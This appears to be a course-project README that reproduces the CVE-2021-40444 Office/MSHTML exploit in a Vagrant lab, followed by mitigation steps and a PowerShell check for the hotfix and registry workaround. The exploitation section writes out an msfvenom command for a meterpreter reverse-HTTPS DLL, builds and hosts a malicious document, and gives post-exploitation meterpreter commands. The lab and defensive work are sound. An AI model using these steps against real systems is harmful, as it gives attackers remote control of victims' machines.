# TIC4301_Project
TIC4301 Project - CVE-2021-40444

Download the following vagrant boxes: \
Kali  - \
Win10 -

Import the boxes with the following commands through vagrant:
1. vagrant box add
2. vagrant box add
3. vagrant init
4. vagrant init
5. vagrant up

Setup (Win10):
1. In the Win10 box, log in as administrator with the password vagrant.
2. Right-click script.ps1 on the desktop and select Run with PowerShell. (Leave this window open.)
3. Run `ipconfig.exe` and note the IP address of this host.

Setup & Exploitation (Kali):
1. `cd Desktop/CVE-2021-40444`
2. Generate your malicious DLL with msfvenom: `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll`
3. Start a listener in Metasploit.
4. Generate the malicious document: `python3 generate test/shell.dll <Kali IP>`
5. `sudo python3 host 80` (to host your server for the file downloads)
6. Visit `http://<win 10 IP>/upload` and upload the file.
7. Listen for the shell.

Further Exploitation:
1. `run post/windows/manage/migrate` (meterpreter)
2. `shell` (meterpreter)

Mitigation:
1. Install the KB5005565 hotfix.
2. Edit the Windows registry with patch.reg in the repository.
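
To confirm on the Win10 box that the hotfix and the registry change above took effect, the following check can be run in an elevated PowerShell session. It is an added example, not part of this repository, and it assumes patch.reg applies Microsoft's published workaround for CVE-2021-40444 (URL actions 1001 and 1004 set to 3, "Disable", for zones 0-3 under the policy key below); the function name is hypothetical.

```powershell
# Added example: verify the two mitigation steps on the Win10 lab box.
# Assumption: patch.reg sets URL actions 1001 and 1004 (ActiveX download)
# to 3 (Disable) for zones 0-3, as in Microsoft's published workaround.

function Test-Cve202140444Mitigation {
    $kb   = 'KB5005565'   # hotfix named in this README
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'

    # Get-HotFix only lists updates recorded on this machine. A later
    # cumulative update supersedes this KB, so "not found" on a host that
    # was patched afterwards does not by itself mean the host is vulnerable.
    $hotfix = Get-HotFix -Id $kb -ErrorAction SilentlyContinue

    # Read each zone's ActiveX URL actions; a missing key or value is
    # reported as not disabled.
    $zones = foreach ($zone in 0..3) {
        foreach ($action in '1001', '1004') {
            $path  = Join-Path $base $zone
            $value = (Get-ItemProperty -Path $path -Name $action -ErrorAction SilentlyContinue).$action
            [pscustomobject]@{
                Zone     = $zone
                Action   = $action
                Value    = $value
                Disabled = ($value -eq 3)
            }
        }
    }

    [pscustomobject]@{
        HotfixInstalled   = [bool]$hotfix
        WorkaroundApplied = -not ($zones | Where-Object { -not $_.Disabled })
        ZoneDetail        = $zones
    }
}

$result = Test-Cve202140444Mitigation
$result | Select-Object HotfixInstalled, WorkaroundApplied | Format-List
$result.ZoneDetail | Format-Table -AutoSize
```

Run it once before and once after applying the mitigation steps to see both values change in the lab.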